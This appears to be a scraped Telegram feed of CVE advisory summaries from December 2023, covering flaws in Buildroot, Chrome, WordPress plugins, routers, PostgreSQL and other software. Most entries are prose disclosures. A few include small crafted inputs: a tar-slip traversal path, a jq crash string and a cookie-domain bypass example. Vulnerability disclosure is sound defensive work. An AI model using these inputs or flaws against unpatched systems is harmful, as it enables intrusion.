🚨 CVE-2023-42916An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.🎖@cveNotify |
|
| 2023-12-12 01:47:10 |
🚨 CVE-2023-45842Multiple data integrity vulnerabilities exist in the package hash checking functionality of Buildroot 2023.08.1 and Buildroot dev commit 622698d7847. A specially crafted man-in-the-middle attack can lead to arbitrary command execution in the builder.This vulnerability is related to the `mxsldr` package.🎖@cveNotify |
|
| 2023-12-12 01:17:29 |
🚨 CVE-2023-36647A hard-coded cryptographic private key used to sign JWT authentication tokens in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate arbitrary users and roles in web management and REST API endpoints via crafted JWT tokens.🎖@cveNotify |
|
| 2023-12-12 01:17:22 |
🚨 CVE-2023-45840Multiple data integrity vulnerabilities exist in the package hash checking functionality of Buildroot 2023.08.1 and Buildroot dev commit 622698d7847. A specially crafted man-in-the-middle attack can lead to arbitrary command execution in the builder.This vulnerability is related to the `riscv64-elf-toolchain` package.🎖@cveNotify |
|
| 2023-12-12 01:17:21 |
🚨 CVE-2023-45839Multiple data integrity vulnerabilities exist in the package hash checking functionality of Buildroot 2023.08.1 and Buildroot dev commit 622698d7847. A specially crafted man-in-the-middle attack can lead to arbitrary command execution in the builder.This vulnerability is related to the `aufs-util` package.🎖@cveNotify |
|
| 2023-12-12 00:17:10 |
🚨 CVE-2023-36646Incorrect user role checking in multiple REST API endpoints in ProLion CryptoSpike 3.0.15P2 allows a remote attacker with low privileges to execute privileged functions and achieve privilege escalation via REST API endpoint invocation.🎖@cveNotify |
|
| 2023-12-11 23:17:11 |
🚨 CVE-2023-49803@koa/cors npm provides Cross-Origin Resource Sharing (CORS) for koa, a web framework for Node.js. Prior to version 5.0.0, the middleware operates in a way that if an allowed origin is not provided, it will return an `Access-Control-Allow-Origin` header with the value of the origin from the request. This behavior completely disables one of the most crucial elements of browsers - the Same Origin Policy (SOP), this could cause a very serious security threat to the users of this middleware. If such behavior is expected, for instance, when middleware is used exclusively for prototypes and not for production applications, it should be heavily emphasized in the documentation along with an indication of the risks associated with such behavior, as many users may not be aware of it. Version 5.0.0 fixes this vulnerability.🎖@cveNotify |
|
| 2023-12-11 23:17:10 |
🚨 CVE-2021-3187An issue was discovered in BeyondTrust Privilege Management for Mac before 5.7. An authenticated, unprivileged user can elevate privileges by running a malicious script (that executes as root from a temporary directory) during install time. (This applies to macOS before 10.15.5, or Security Update 2020-003 on Mojave and High Sierra, Later versions of macOS are not vulnerable.)🎖@cveNotify |
|
| 2023-12-11 22:17:10 |
🚨 CVE-2020-12613An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. An attacker can spawn a process with multiple users as part of the security token (prior to Avecto elevation). When Avecto elevates the process, it removes the user who is launching the process, but not the second user. Therefore this second user still retains access and can give permission to the process back to the first user.🎖@cveNotify |
|
| 2023-12-11 21:17:15 |
🚨 CVE-2023-49796MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 contain a limited file write vulnerability in `file.py` Users should use MindsDB's `staging` branch or v23.11.4.1, which contain a fix for the issue.🎖@cveNotify |
|
| 2023-12-11 21:17:11 |
🚨 CVE-2023-49490XunRuiCMS v4.5.5 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /admin.php.🎖@cveNotify |
|
| 2023-12-11 21:17:10 |
🚨 CVE-2023-30581The use of __proto__ in process.mainModule.__proto__.require() can bypass the policy mechanism and require modules outside of the policy.json definition. This vulnerability affects all users using the experimental policy mechanism in all active release lines: v16, v18 and, v20.Please note that at the time this CVE was issued, the policy is an experimental feature of Node.js🎖@cveNotify |
|
| 2023-12-11 20:47:10 |
🚨 CVE-2023-42581Improper URL validation from InstantPlay deeplink in Galaxy Store prior to version 4.5.64.4 allows attackers to execute JavaScript API to access data.🎖@cveNotify |
|
| 2023-12-11 20:17:22 |
🚨 CVE-2023-5940The WP Not Login Hide (WPNLH) WordPress plugin through 1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-12-11 20:17:21 |
🚨 CVE-2023-5907The File Manager WordPress plugin before 6.3 does not restrict the file managers root directory, allowing an administrator to set a root outside of the WordPress root directory, giving access to system files and directories even in a multisite setup, where site administrators should not be allowed to modify the sites files.🎖@cveNotify |
|
| 2023-12-11 20:17:17 |
🚨 CVE-2023-5750The EmbedPress WordPress plugin before 3.9.2 does not sanitise and escape a parameter before outputting it back in the page containing a specific content, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-12-11 20:17:16 |
🚨 CVE-2023-28876A Broken Access Control issue in comments to uploaded files in Filerun through Update 20220202 allows attackers to delete comments on files uploaded by other users.🎖@cveNotify |
|
| 2023-12-11 20:17:11 |
🚨 CVE-2023-24547On affected platforms running Arista MOS, the configuration of a BGP password will cause the password to be logged in clear text that can be revealed in local logs or remote logging servers by authenticated users, as well as appear in clear text in the device’s running config.🎖@cveNotify |
|
| 2023-12-11 20:17:10 |
🚨 CVE-2023-38712An issue was discovered in Libreswan 3.x and 4.x before 4.12. When an IKEv1 ISAKMP SA Informational Exchange packet contains a Delete/Notify payload followed by further Notifies that act on the ISAKMP SA, such as a duplicated Delete/Notify message, a NULL pointer dereference on the deleted state causes the pluto daemon to crash and restart.🎖@cveNotify |
|
| 2023-12-11 19:47:18 |
🚨 CVE-2021-27795Brocade Fabric OS (FOS) hardware platforms running any version of Brocade Fabric OS software, which supports the license string format; contain cryptographic issues that could allow for the installation of forged or fraudulent license keys. This would allow attackers or a malicious party to forge a counterfeit license key that the Brocade Fabric OS platform would authenticate and activate as if it were a legitimate license key.🎖@cveNotify |
|
| 2023-12-11 19:47:11 |
🚨 CVE-2023-5871A flaw was found in libnbd, due to a malicious Network Block Device (NBD), a protocol for accessing Block Devices such as hard disks over a Network. This issue may allow a malicious NBD server to cause a Denial of Service.🎖@cveNotify |
|
| 2023-12-11 19:47:10 |
🚨 CVE-2023-38710An issue was discovered in Libreswan before 4.12. When an IKEv2 Child SA REKEY packet contains an invalid IPsec protocol ID number of 0 or 1, an error notify INVALID_SPI is sent back. The notify payload's protocol ID is copied from the incoming packet, but the code that verifies outgoing packets fails an assertion that the protocol ID must be ESP (2) or AH(3) and causes the pluto daemon to crash and restart. NOTE: the earliest affected version is 3.20.🎖@cveNotify |
|
| 2023-12-11 19:17:27 |
🚨 CVE-2023-45866Bluetooth HID Hosts in BlueZ may permit an unauthenticated Peripheral role HID Device to initiate and establish an encrypted connection, and accept HID keyboard reports, potentially permitting injection of HID messages when no user interaction has occurred in the Central role to authorize such access. An example affected package is bluez 5.64-0ubuntu1 in Ubuntu 22.04LTS. NOTE: in some cases, a CVE-2020-0556 mitigation would have already addressed this Bluetooth HID Hosts issue.🎖@cveNotify |
|
| 2023-12-11 19:17:26 |
🚨 CVE-2023-6512Inappropriate implementation in Web Browser UI in Google Chrome prior to 120.0.6099.62 allowed a remote attacker to potentially spoof the contents of an iframe dialog context menu via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-12-11 19:17:25 |
🚨 CVE-2023-6511Inappropriate implementation in Autofill in Google Chrome prior to 120.0.6099.62 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-12-11 19:17:22 |
🚨 CVE-2023-33079Memory corruption in Audio while running invalid audio recording from ADSP.🎖@cveNotify |
|
| 2023-12-11 19:17:21 |
🚨 CVE-2023-42842The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.1. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2023-12-11 19:17:20 |
🚨 CVE-2023-5344Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1969.🎖@cveNotify |
|
| 2023-12-11 19:17:17 |
🚨 CVE-2020-19190Buffer Overflow vulnerability in _nc_find_entry in tinfo/comp_hash.c:70 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.🎖@cveNotify |
|
| 2023-12-11 19:17:16 |
🚨 CVE-2020-19187Buffer Overflow vulnerability in fmt_entry function in progs/dump_entry.c:1100 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.🎖@cveNotify |
|
| 2023-12-11 19:17:15 |
🚨 CVE-2020-19186Buffer Overflow vulnerability in _nc_find_entry function in tinfo/comp_hash.c:66 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.🎖@cveNotify |
|
| 2023-12-11 19:17:11 |
🚨 CVE-2023-32317Autolab is a course management service that enables auto-graded programming assignments. A Tar slip vulnerability was found in the MOSS cheat checker functionality of Autolab. To exploit this vulnerability an authenticated attacker with instructor permissions needs to upload a specially crafted Tar file. Both "Base File Tar" and "Additional file archive" can be fed with Tar files that contain paths outside their target directories (e.g., `../../../../tmp/tarslipped2.sh`). When the MOSS cheat checker is started the files inside of the archives are expanded to the attacker-chosen locations. This issue may lead to arbitrary file write within the scope of the running process. This issue has been addressed in version 2.11.0. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-12-11 19:17:10 |
🚨 CVE-2022-41955Autolab is a course management service, initially developed by a team of students at Carnegie Mellon University, that enables instructors to offer autograded programming assignments to their students over the Web. A remote code execution vulnerability was discovered in Autolab's MOSS functionality, whereby an instructor with access to the feature might be able to execute code on the server hosting Autolab. This vulnerability has been patched in version 2.10.0. As a workaround, disable the MOSS feature if it is unneeded by replacing the body of `run_moss` in `app/controllers/courses_controller.rb` with `render(plain: "Feature disabled", status: :bad_request) && return`.🎖@cveNotify |
|
| 2023-12-11 18:17:26 |
🚨 CVE-2023-33041Under certain scenarios the WLAN Firmware will reach an assertion due to state confusion while looking up peer ids.🎖@cveNotify |
|
| 2023-12-11 18:17:19 |
🚨 CVE-2023-33017Memory corruption in Boot while running a ListVars test in UEFI Menu during boot.🎖@cveNotify |
|
| 2023-12-11 18:17:18 |
🚨 CVE-2023-5808SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in a Storage administrative role are able to access HNAS configuration backup and diagnostic data, that would normally be barred to that specific administrative role.🎖@cveNotify |
|
| 2023-12-11 17:47:24 |
🚨 CVE-2023-49464libheif v1.17.5 was discovered to contain a segmentation violation via the function UncompressedImageCodec::get_luma_bits_per_pixel_from_configuration_unci.🎖@cveNotify |
|
| 2023-12-11 17:47:17 |
🚨 CVE-2023-49462libheif v1.17.5 was discovered to contain a segmentation violation via the component /libheif/exif.cc.🎖@cveNotify |
|
| 2023-12-11 17:47:16 |
🚨 CVE-2023-46688Open redirect vulnerability in Pleasanter 1.3.47.0 and earlier allows a remote unauthenticated attacker to redirect users to arbitrary web sites via a specially crafted URL.🎖@cveNotify |
|
| 2023-12-11 17:47:11 |
🚨 CVE-2023-49897An OS command injection vulnerability exists in AE1021PE firmware version 2.0.9 and earlier and AE1021 firmware version 2.0.9 and earlier. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.🎖@cveNotify |
|
| 2023-12-11 17:47:10 |
🚨 CVE-2023-49735** UNSUPPORTED WHEN ASSIGNED **The value set as the DefaultLocaleResolver.LOCALE_KEY attribute on the session was not validated while resolving XML definition files, leading to possible path traversal and eventually SSRF/XXE when passing user-controlled data to this key. Passing user-controlled data to this key may be relatively common, as it was also used like that to set the language in the 'tiles-test' application shipped with Tiles.This issue affects Apache Tiles from version 2 onwards.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-12-11 16:47:34 |
🚨 CVE-2023-48849Ruijie EG Series Routers version EG_3.0(1)B11P216 and before allows unauthenticated attackers to remotely execute arbitrary code due to incorrect filtering.🎖@cveNotify |
|
| 2023-12-11 15:47:28 |
🚨 CVE-2023-43302An issue in sanTas mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2023-12-11 15:47:27 |
🚨 CVE-2023-45838Multiple data integrity vulnerabilities exist in the package hash checking functionality of Buildroot 2023.08.1 and Buildroot dev commit 622698d7847. A specially crafted man-in-the-middle attack can lead to arbitrary command execution in the builder.This vulnerability is related to the `aufs` package.🎖@cveNotify |
|
| 2023-12-11 15:47:26 |
🚨 CVE-2023-43608A data integrity vulnerability exists in the BR_NO_CHECK_HASH_FOR functionality of Buildroot 2023.08.1 and dev commit 622698d7847. A specially crafted man-in-the-middle attack can lead to arbitrary command execution in the builder.🎖@cveNotify |
|
| 2023-12-11 15:47:22 |
🚨 CVE-2023-5188The MMS Interpreter of WagoAppRTU in versions below 1.4.6.0 which is used by the WAGO Telecontrol Configurator is vulnerable to malformed packets. An remote unauthenticated attacker could send specifically crafted packets that lead to a denial-of-service condition until restart of the affected device.🎖@cveNotify |
|
| 2023-12-11 15:47:21 |
🚨 CVE-2023-43472An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST API.🎖@cveNotify |
|
| 2023-12-11 15:47:17 |
🚨 CVE-2023-44288Dell PowerScale OneFS, 8.2.2.x through 9.6.0.x, contains an improper control of a resource through its lifetime vulnerability. An unauthenticated network attacker could potentially exploit this vulnerability, leading to denial of service.🎖@cveNotify |
|
| 2023-12-11 15:47:16 |
🚨 CVE-2022-47531An issue was discovered in Ericsson Evolved Packet Gateway (EPG) versions 3.x before 3.25 and 2.x before 2.16, allows authenticated users to bypass system CLI and execute commands they are authorized to execute directly in the UNIX shell.🎖@cveNotify |
|
| 2023-12-11 15:47:12 |
🚨 CVE-2023-47304An issue was discovered in Vonage Box Telephone Adapter VDV23 version VDV21-3.2.11-0.5.1, allows local attackers to bypass UART authentication controls and read/write arbitrary values to the memory of the device.🎖@cveNotify |
|
| 2023-12-11 15:47:11 |
🚨 CVE-2023-42576Improper Authentication vulnerability in Samsung Pass prior to version 4.3.00.17 allows physical attackers to bypass authentication due to invalid exception handler.🎖@cveNotify |
|
| 2023-12-11 15:47:10 |
🚨 CVE-2021-35975Absolute path traversal vulnerability in the Systematica SMTP Adapter component (up to v2.0.1.101) in Systematica Radius (up to v.3.9.256.777) allows remote attackers to read arbitrary files via a full pathname in GET parameter "file" in URL. Also: affected components in same product - HTTP Adapter (up to v.1.8.0.15), MSSQL MessageBus Proxy (up to v.1.1.06), Financial Calculator (up to v.1.3.05), FIX Adapter (up to v.2.4.0.25)🎖@cveNotify |
|
| 2023-12-11 13:47:41 |
🚨 CVE-2023-22668Memory Corruption in Audio while invoking IOCTLs calls from the user-space.🎖@cveNotify |
|
| 2023-12-11 13:47:40 |
🚨 CVE-2023-22383Memory Corruption in camera while installing a fd for a particular DMA buffer.🎖@cveNotify |
|
| 2023-12-11 12:17:13 |
🚨 CVE-2023-6185Improper Input Validation vulnerability in GStreamer integration of The Document Foundation LibreOffice allows an attacker to execute arbitrary GStreamer plugins.In affected versions the filename of the embedded video is not sufficiently escaped when passed to GStreamer enabling an attacker to run arbitrary gstreamer plugins depending on what plugins are installed on the target system.🎖@cveNotify |
|
| 2023-12-11 09:17:12 |
🚨 CVE-2023-5981A vulnerability was found that the response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding.🎖@cveNotify |
|
| 2023-12-11 08:18:34 |
🚨 CVE-2023-49964An issue was discovered in Hyland Alfresco Community Edition through 7.2.0. By inserting malicious content in the folder.get.html.ftl file, an attacker may perform SSTI (Server-Side Template Injection) attacks, which can leverage FreeMarker exposed objects to bypass restrictions and achieve RCE (Remote Code Execution). NOTE: this issue exists because of an incomplete fix for CVE-2020-12873.🎖@cveNotify |
|
| 2023-12-11 07:17:12 |
🚨 CVE-2023-49355decToString in decNumber/decNumber.c in jq 88f01a7 has a one-byte out-of-bounds write via the " []-1.2e-1111111111" input.🎖@cveNotify |
|
| 2023-12-11 06:17:11 |
🚨 CVE-2023-48425U-Boot vulnerability resulting in persistent Code Execution🎖@cveNotify |
|
| 2023-12-11 06:17:10 |
🚨 CVE-2023-48417Missing Permission checks resulting in unauthorized access and Manipulation in KeyChainActivity Application🎖@cveNotify |
|
| 2023-12-11 03:17:24 |
🚨 CVE-2023-45842Multiple data integrity vulnerabilities exist in the package hash checking functionality of Buildroot 2023.08.1 and Buildroot dev commit 622698d7847. A specially crafted man-in-the-middle attack can lead to arbitrary command execution in the builder.This vulnerability is related to the `mxsldr` package.🎖@cveNotify |
|
| 2023-12-11 03:17:17 |
🚨 CVE-2023-45839Multiple data integrity vulnerabilities exist in the package hash checking functionality of Buildroot 2023.08.1 and Buildroot dev commit 622698d7847. A specially crafted man-in-the-middle attack can lead to arbitrary command execution in the builder.This vulnerability is related to the `aufs-util` package.🎖@cveNotify |
|
| 2023-12-11 03:17:16 |
🚨 CVE-2023-43608A data integrity vulnerability exists in the BR_NO_CHECK_HASH_FOR functionality of Buildroot 2023.08.1 and dev commit 622698d7847. A specially crafted man-in-the-middle attack can lead to arbitrary command execution in the builder.🎖@cveNotify |
|
| 2023-12-11 01:17:13 |
🚨 CVE-2023-50465A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user.🎖@cveNotify |
|
| 2023-12-10 23:17:10 |
🚨 CVE-2023-50463The caddy-geo-ip (aka GeoIP) middleware through 0.6.0 for Caddy 2, when trust_header X-Forwarded-For is used, allows attackers to spoof their source IP address via an X-Forwarded-For header, which may bypass a protection mechanism (trusted_proxy directive in reverse_proxy or IP address range restrictions).🎖@cveNotify |
|
| 2023-12-10 21:17:10 |
🚨 CVE-2023-6656** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22. It has been rated as critical. Affected by this issue is some unknown functionality of the file DFLIMG/DFLJPG.py. The manipulation leads to deserialization. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of this vulnerability is VDB-247364. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-12-10 19:17:15 |
🚨 CVE-2023-50457An issue was discovered in Zammad before 6.2.0. When listing tickets linked to a knowledge base answer, or knowledge base answers of a ticket, a user could see entries for which they lack permissions.🎖@cveNotify |
|
| 2023-12-10 19:17:11 |
🚨 CVE-2023-50454An issue was discovered in Zammad before 6.2.0. In several subsystems, SSL/TLS was used to establish connections to external services without proper validation of hostname and certificate authority. This is exploitable by man-in-the-middle attackers.🎖@cveNotify |
|
| 2023-12-10 19:17:10 |
🚨 CVE-2022-48614Special:Ask in Semantic MediaWiki before 4.0.2 allows Reflected XSS.🎖@cveNotify |
|
| 2023-12-10 18:17:11 |
🚨 CVE-2023-5869A flaw was found in PostgreSQL that allows authenticated database users to execute arbitrary code through missing overflow checks during SQL array value modification. This issue exists due to an integer overflow during array modification where a remote user can trigger the overflow by providing specially crafted data. This enables the execution of arbitrary code on the target system, allowing users to write arbitrary bytes to memory and extensively read the server's memory.🎖@cveNotify |
|
| 2023-12-10 18:17:10 |
🚨 CVE-2022-22817PIL.ImageMath.eval in Pillow before 9.0.0 allows evaluation of arbitrary expressions, such as ones that use the Python exec method. A lambda expression could also be used.🎖@cveNotify |
|
| 2023-12-10 17:17:27 |
🚨 CVE-2023-50446An issue was discovered in Mullvad VPN Windows app before 2023.6-beta1. Insufficient permissions on a directory allow any local unprivileged user to escalate privileges to SYSTEM.🎖@cveNotify |
|
| 2023-12-10 10:49:07 |
https://t.me/malwr |
|
| 2023-12-10 09:29:56 |
🚨 CVE-2023-6648A vulnerability, which was classified as critical, was found in PHPGurukul Nipah Virus Testing Management System 1.0. This affects an unknown part of the file password-recovery.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247341 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-10 07:29:56 |
🚨 CVE-2023-6647A vulnerability, which was classified as critical, has been found in AMTT HiBOS 1.0. Affected by this issue is some unknown functionality. The manipulation of the argument Type leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247340. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-10 03:29:56 |
🚨 CVE-2023-46218This flaw allows a malicious HTTP server to set "super cookies" in curl thatare then passed back to more origins than what is otherwise allowed orpossible. This allows a site to set cookies that then would get sent todifferent and unrelated sites and domains.It could do this by exploiting a mixed case flaw in curl's function thatverifies a given cookie domain against the Public Suffix List (PSL). Forexample a cookie could be set with `domain=co.UK` when the URL used a lowercase hostname `curl.co.uk`, even though `co.uk` is listed as a PSL domain.🎖@cveNotify |
|
| 2023-12-09 23:29:56 |
🚨 CVE-2023-50431sec_attest_info in drivers/accel/habanalabs/common/habanalabs_ioctl.c in the Linux kernel through 6.6.5 allows an information leak to user space because info->pad0 is not initialized.🎖@cveNotify |
|
| 2023-12-09 22:30:02 |
🚨 CVE-2023-6646A vulnerability classified as problematic has been found in linkding 1.23.0. Affected is an unknown function. The manipulation of the argument q leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.23.1 is able to address this issue. It is recommended to upgrade the affected component. VDB-247338 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early, responded in a very professional manner and immediately released a fixed version of the affected product.🎖@cveNotify |
|
| 2023-12-09 22:30:01 |
🚨 CVE-2023-50429IzyBat Orange casiers before 20230803_1 allows getEnsemble.php ensemble SQL injection.🎖@cveNotify |
|
| 2023-12-09 22:29:57 |
🚨 CVE-2023-6512Inappropriate implementation in Web Browser UI in Google Chrome prior to 120.0.6099.62 allowed a remote attacker to potentially spoof the contents of an iframe dialog context menu via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-12-09 22:29:56 |
🚨 CVE-2023-6508Use after free in Media Stream in Google Chrome prior to 120.0.6099.62 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-09 17:29:56 |
🚨 CVE-2023-36922Due to programming error in function module and report, IS-OIL component in SAP ECC and SAP S/4HANA allows an authenticated attacker to inject an arbitrary operating system command into an unprotected parameter in a common (default) extension. On successful exploitation, the attacker can read or modify the system data as well as shut down the system.🎖@cveNotify |
|
| 2023-12-09 08:29:56 |
🚨 CVE-2023-47254An OS Command Injection in the CLI interface on DrayTek Vigor167 version 5.2.2, allows remote attackers to execute arbitrary system commands and escalate privileges via any account created within the web interface.🎖@cveNotify |
|
| 2023-12-09 07:30:03 |
🚨 CVE-2023-46932Heap Buffer Overflow vulnerability in GPAC version 2.3-DEV-rev617-g671976fcc-master, allows attackers to execute arbitrary code and cause a denial of service (DoS) via str2ulong class in src/media_tools/avilib.c in gpac/MP4Box.🎖@cveNotify |
|
| 2023-12-09 07:30:02 |
🚨 CVE-2023-28873An XSS issue in wiki and discussion pages in Seafile 9.0.6 allows attackers to inject JavaScript into the Markdown editor.🎖@cveNotify |
|
| 2023-12-09 07:29:57 |
🚨 CVE-2023-28870Insecure File Permissions in Support Assistant in NCP Secure Enterprise Client before 12.22 allow attackers to write to configuration files from low-privileged user accounts.🎖@cveNotify |
|
| 2023-12-09 07:29:56 |
🚨 CVE-2023-6612A vulnerability was found in Totolink X5000R 9.1.0cu.2300_B20230112. It has been rated as critical. This issue affects the function setDdnsCfg/setDynamicRoute/setFirewallType/setIPSecCfg/setIpPortFilterRules/setLancfg/setLoginPasswordCfg/setMacFilterRules/setMtknatCfg/setNetworkConfig/setPortForwardRules/setRemoteCfg/setSSServer/setScheduleCfg/setSmartQosCfg/setStaticDhcpRules/setStaticRoute/setVpnAccountCfg/setVpnPassCfg/setVpnUser/setWiFiAclAddConfig/setWiFiEasyGuestCfg/setWiFiGuestCfg/setWiFiRepeaterConfig/setWiFiScheduleCfg/setWizardCfg of the file /cgi-bin/cstecgi.cgi. The manipulation leads to os command injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247247. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-09 06:29:56 |
🚨 CVE-2023-47465An issue in GPAC v.2.2.1 and before allows a local attacker to cause a denial of service (DoS) via the ctts_box_read function of file src/isomedia/box_code_base.c.🎖@cveNotify |
|
| 2023-12-09 05:00:13 |
🚨 CVE-2023-49448JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via admin/nav/delete.🎖@cveNotify |
|
| 2023-12-09 05:00:12 |
🚨 CVE-2023-49398JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/category/delete.🎖@cveNotify |
|
| 2023-12-09 05:00:07 |
🚨 CVE-2023-49395JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/category/update.🎖@cveNotify |
|
| 2023-12-09 05:00:06 |
🚨 CVE-2023-49382JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/div/delete.🎖@cveNotify |
|
| 2023-12-09 05:00:02 |
🚨 CVE-2023-49379JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /admin/friend_link/save.🎖@cveNotify |
|
| 2023-12-09 05:00:01 |
🚨 CVE-2023-49377JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/tag/update.🎖@cveNotify |
|
| 2023-12-09 04:59:57 |
🚨 CVE-2023-49374JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/slide/update.🎖@cveNotify |
|
| 2023-12-09 04:59:56 |
🚨 CVE-2023-49372JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/slide/save.🎖@cveNotify |
|
| 2023-12-09 04:30:02 |
🚨 CVE-2023-6511Inappropriate implementation in Autofill in Google Chrome prior to 120.0.6099.62 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-12-09 04:29:57 |
🚨 CVE-2023-6509Use after free in Side Panel Search in Google Chrome prior to 120.0.6099.62 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-09 04:29:56 |
🚨 CVE-2023-42916An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.🎖@cveNotify |
|
| 2023-12-09 03:29:57 |
🚨 CVE-2023-47722IBM API Connect V10.0.5.3 and V10.0.6.0 stores user credentials in browser cache which can be read by a local user. IBM X-Force ID: 271912.🎖@cveNotify |
|
| 2023-12-09 03:29:56 |
🚨 CVE-2023-28523IBM Informix Dynamic Server 12.10 and 14.10 onsmsync is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow an attacker to execute arbitrary code. IBM X-Force ID: 250753.🎖@cveNotify |
|
| 2023-12-09 02:29:56 |
🚨 CVE-2020-25835A potential vulnerability has been identified in Micro Focus ArcSight Management Center. The vulnerability could be remotely exploited resulting in stored Cross-Site Scripting (XSS).🎖@cveNotify |
|
| 2023-12-09 01:29:56 |
🚨 CVE-2023-49797PyInstaller bundles a Python application and all its dependencies into a single package. A PyInstaller built application, elevated as a privileged process, may be tricked by an unprivileged attacker into deleting files the unprivileged user does not otherwise have access to. A user is affected if **all** the following are satisfied: 1. The user runs an application containing either `matplotlib` or `win32com`. 2. The application is ran as administrator (or at least a user with higher privileges than the attacker). 3. The user's temporary directory is not locked to that specific user (most likely due to `TMP`/`TEMP` environment variables pointing to an unprotected, arbitrary, non default location). Either: A. The attacker is able to very carefully time the replacement of a temporary file with a symlink. This switch must occur exactly between `shutil.rmtree()`'s builtin symlink check and the deletion itself B: The application was built with Python 3.7.x or earlier which has no protection against Directory Junctions links. The vulnerability has been addressed in PR #7827 which corresponds to `pyinstaller >= 5.13.1`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-09 00:30:22 |
🚨 CVE-2023-49800`nuxt-api-party` is an open source module to proxy API requests. The library allows the user to send many options directly to `ofetch`. There is no filter on which options are available. We can abuse the retry logic to cause the server to crash from a stack overflow. fetchOptions are obtained directly from the request body. A malicious user can construct a URL known to not fetch successfully, then set the retry attempts to a high value, this will cause a stack overflow as ofetch error handling works recursively resulting in a denial of service. This issue has been addressed in version 0.22.1. Users are advised to upgrade. Users unable to upgrade should limit ofetch options.🎖@cveNotify |
|
| 2023-12-09 00:30:21 |
🚨 CVE-2023-49798OpenZeppelin Contracts is a library for smart contract development. A merge issue when porting the 5.0.1 patch to the 4.9 branch caused a line duplication. In the version of `Multicall.sol` released in `@openzeppelin/contracts@4.9.4` and `@openzeppelin/contracts-upgradeable@4.9.4`, all subcalls are executed twice. Concretely, this exposes a user to unintentionally duplicate operations like asset transfers. The duplicated delegatecall was removed in version 4.9.5. The 4.9.4 version is marked as deprecated. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-12-08 21:59:56 |
